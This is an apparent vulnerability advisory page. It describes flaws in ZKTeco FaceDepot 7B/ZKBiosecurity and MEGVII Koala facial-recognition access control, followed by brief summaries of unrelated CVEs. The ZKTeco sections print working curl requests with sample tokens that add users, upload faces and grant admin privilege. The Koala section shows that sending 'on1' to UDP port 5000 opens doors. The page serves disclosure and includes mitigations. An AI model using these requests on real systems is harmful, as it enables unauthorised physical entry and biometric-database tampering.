All Vulnerabilities

Lack of mutual authentication in ZKTeco FaceDepot 7B 1.0.213 and ZKBiosecurity Server 1.0.0_20190723 allows an attacker to obtain a long-lasting token by impersonating the server.

The vulnerability has been submitted to ZDI on Dec 3, 2019.

ZDI got one response from the vendor which acknowledged but not confirmed the vulnerability. The responsible disclosure expired on April 30, 2020.

The vendor addressed the vulnerability and has recommended to install an updated version of the software. The update can be found via the vendor's link:

• ZKBioSecurityV5000 3.1.1 R

Details

The researchers have tried two ways to successfully steal the access token in the HTTP header.

1. Use a Python script (zkteco.py, see below) and a self-signed SSL certificate to simulate ZKBiosecurity Server (ADMS) and do ARP spoofing on HTTPS port 8088.
2. Wireshark the default deployment, which does HTTP instead of HTTPS.

We found no CSRF to prevent such attack. Moreover, the token has a long life (at least 2 weeks), and is still valid even after FaceDepot 7B (the Android tablet) issues a new token. The token can be used in replay attack, command forgery, arbitrary user addition and privilege escalation (CVE-2020-17474).

We wrote a proof-of-concept to simulate ZKBiosecurity ADMS with reasonably dummy response. The SSL certificate is self-signed. We did not install the CA into the tablet. After taking over ZKBiosecurity Server's IP by arpspoofing, the script is able to obtain the token for further use. FaceDepot tablet reconnects to the server every 2 - 3 minutes and thus automatically submits a legit token.

After SN and token are obtained, it is easy to, for example, create a user, by using cURL:

curl -v -L -X POST -A 'iClock Proxy/1.09' 'http://192.168.0.1:8088/iclock/cdata?SN=LSR1915060003&table=tabledata&tablename=user&count=1' \
    -b 'token=a72182ceb8e4695ea84300155953566d' -H 'Accept: application/push' -H 'Accept-Charset: UTF-8' -H 'Accept-Language: zh-CN' \
    -H 'Content-Type: application/push;charset=UTF-8' -H 'Content-Language: zh-CN' -d@bugoy.user.post

Where the content of bugoy.user.post is:

user uuid=	cardno=	pin=11111	password=	group=1	starttime=0 	endtime=0	name=Bugoy Test1	privilege=14	disable=0	verify=0

Vulnerability Type

• CWE-613: Insufficient Session Expiration
• CWE-295: Improper Certificate Validation

Attack Type

Remote

Impact Information Disclosure

true

Attack Vectors

An attacker who is able to sniff the network or arp-spoof with a fake server obtains a long-lasting token.

Mitigation

• Deploy a firewall in front of ZKBiosecurity Server and enforce allowed IP list and allowed MAC list.
• Deny all unlisted access.

Discoverer

Roel Reyes, Joey Costoya, Philippe Lin, Vincenzo Ciancaglini, Morton Swimmer

Reference

https://www.zkteco.com/en/product_detail/FaceDepot-7B.html

A token-reuse vulnerability in ZKTeco FaceDepot 7B 1.0.213 and ZKBiosecurity Server 1.0.0_20190723 allows an attacker to create arbitrary new users, elevate users to administrators, delete users, and download user faces from the database.

The vulnerability has been submitted to ZDI on Dec 3, 2019.

ZDI got one response from the vendor which acknowledged but not confirmed the vulnerability. The responsible disclosure was expired on April 30, 2020.

Details

ZKBiosecurity Server does not do client authentication except the long-lasting token (cf. CVE-2020-17473). One has to identify which FaceDepot tablet is allowed to register a new user by sniffing the network for a period of time. After obtaining the token of the tablet, one is able to

1. Add a new arbitrary user (who may enter the office),
2. Upload a new picture (allow an adversary to physically infiltrate),
3. Delete an account (after a mission),
4. Escalate the privilege of the new use user admin (able to operate / configure the tablet in front of it.)

Add a new user

--------------
curl -v -L -X POST -A 'iClock Proxy/1.09' 'http://192.168.0.1:8088/iclock/cdata?SN=LSR1915060003&table=tabledata&tablename=user&count=1' \
    -b 'token=a72182ceb8e4695ea84300155953566d' -H 'Accept: application/push' -H 'Accept-Charset: UTF-8' -H 'Accept-Language: zh-CN' \
    -H 'Content-Type: application/push;charset=UTF-8' -H 'Content-Language: zh-CN' -d@bugoy.user.post

Where the content of bugoy.user.post is (tab separated):

user uuid=	cardno=	pin=11111	password=	group=1	starttime=0 	endtime=0	name=Bugoy	privilege=0	disable=0	verify=0

Upload a new picture to the server

----------------------------------
curl -XPOST -A 'iClock Proxy/1.09' 'http://192.168.0.1:8088/iclock/cdata?SN=LSR1915060016&table=tabledata&tablename=biophoto&count=1' \
	-b 'token=8bd7f4495e0ac8781f4bba195827fcda' -H 'Accept: application/push' -H 'Accept-Charset: UTF-8' -H 'Accept-Language: zh-CN' \
	-H 'Content-Type: application/push;charset=UTF-8' -H 'Content-Language: zh-CN' -d@totoro.post

The content of totoro.post is a bit tricky, because the picture is in base64:

biophoto	pin=	filename=.jpg	type=	size=	content=

After a new picture is uploaded, wait until a scheduled time where all FaceDepot tablets are synchronized or when the admin clicks "Update" on the screen.

Escalate the privilege to admin
-------------------------------

Users with "privilege=14" have the admin access to FaceDepot tablet. With the privilege, one can configure the tablet in front of it, to add users, set user privilege, delete users, browse user database, install APK via USB (exposed at the bottom of FaceDepot 7B), and switch to apps other than ZKTeco launcher.

curl -v -L -X POST -A 'iClock Proxy/1.09' 'http://192.168.0.1:8088/iclock/cdata?SN=LSR1915060003&table=tabledata&tablename=user&count=1' \
    -b 'token=a72182ceb8e4695ea84300155953566d' -H 'Accept: application/push' -H 'Accept-Charset: UTF-8' -H 'Accept-Language: zh-CN' \
    -H 'Content-Type: application/push;charset=UTF-8' -H 'Content-Language: zh-CN' -d@admin.post

Where the content of admin.post is (tab separated):

user uuid=2645	cardno=	pin=12345	password=	group=1	starttime=0 	endtime=0	name=Bugoy	privilege=14	disable=0	verify=0

Vulnerability Type
CWE-269: Improper Privilege Management

Attack Type: Remote

Impact Information Disclosure: True

Attack Vectors
The attacker must have access to LAN and use cURL to send HTTP GET/POST.
The attack can be conducted by calling API commands with a long-lasting token.

Mitigation
Deploy a firewall in front of ZKBiosecurity Server and enforce allowed IP list and allowed MAC list.
Deny all unlisted access.

Discoverer: Roel Reyes, Joey Costoya, Philippe Lin, Vincenzo Ciancaglini, Morton Swimmer

Reference: https://www.zkteco.com/en/product_detail/FaceDepot-7B.html

Lack of authentication in the network relays used in MEGVII Koala 2.9.1-c3sallows attackers to grant physical access to anyone by sending packet data to UDP port 5000 of any network relays connected to doors.

The vulnerability has been submitted to ZDI on March 20, 2020 as ZDI-CAN-10793.

The vendor has acknowledged and confirmed the vulnerability and said the production has reached end-of-line while a patch is available in newer products. We are not able to confirm the vendor's statement.The vendor has published a public advisory and asks the customers to upgrade the software when it is available.

Product lines impacted by similar vulnerability will have patches in August 2020.

Details

Megvii Koala is a facial recognition system sold by Megvii. It is marketed towards factory, company concierge, apartment complex, etc. There are several hardware configurations, depending on the system integrator.

The weakness is in the architecture of the Megvii Koala system. The weakest link is the network relay, which has to be either HHT-NET2D or TCP-KP-I404. When an adversary has access to the internal network, one has only to send the string "on1" to UDP port 5000 of all the devices in the network to open all the doors.

The architecture, according to the instruction manual provided by the vendor, is like,

     ----------------------------     UDP 5000                COM/ON/OFF
    |  ---------         ------  | --------------> HHT-NET2D ------------> Door
    | | Backend | <---> | Edge | |
    |  ---------         ------  | <--- HTTP ----> Samsung Tablet
     ----------------------------    USB-C Cable

To our best knowledge, no firewall is recommended in user instruction manuals.

Vulnerability Type
CWE-862: Missing Authorization

Attack Type: Remote

Attack Vectors
To exploit vulnerability, attackers have to have access to LAN of the facial recognition access controller.

Mitigation
Deploy a firewall in front of network relays and allow UDP 5000 from Megvii edge server only.
Deny all other connections.

Discoverer
Roel Reyes, Joey Costoya, Philippe Lin, Vincenzo Ciancaglini, Morton Swimmer

---

Reference
Public advisory from the vendor: http://techsupport.megvii.com/hc/kb/article/1401343/

An insecure method in the ARDoc ActiveX Control (ARDoc.dll) can be exploited to overwrite arbitrary files with the contents of exported documents via a call to the "SaveToFile()" method with a specially crafted "bstrFileName" argument. Successful exploitation of this vulnerability allows execution of arbitrary code.

Quest InTrust is prone to a remote code-execution vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application (typically Internet Explorer) using the ActiveX control. Failed exploit attempts will likely result in denial-of-service conditions.

A denial-of-service vulnerability exists in PowerDNS Authoritative Server. The vulnerability is due to an error in processing queries with overly long qnames. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted DNS packet to the target application. A successful attack could lead to excessive resources being consumed, resulting in a denial of service condition.

A denial of service vulnerability exists in the Windows port of Network Time Foundation's NTP Daemon. An attacker can exploit this vulnerability by sending a large UDP packet to the target server. Successful exploitation results in denial of service conditions on the target server.

A denial of service vulnerability exists in the Network Time Protocol daemon (NTPD). The vulnerability is due to a null pointer dereference when handling crypto-NAK packets. A remote attacker can exploit this vulnerability by sending an unsolicited crypto-NAK packet to the target service. Successful exploitation may result in denial-of-service conditions.

A denial-of-service vulnerability has been reported in NGINX. The vulnerability is due to nginx dereferencing an invalid pointer while processing certain DNS packets. A remote attacker could exploit this vulnerability by forging UDP packets as if from a trusted DNS server. Successful exploitation attempt may result in denial-of-service condition.

A denial of service vulnerability exists in the way the Local Security Authority Subsystem Service (LSASS) handles authentication requests. An attacker who successfully exploited the vulnerability could cause a denial of service on the target system's LSASS service, which triggers an automatic reboot of the system.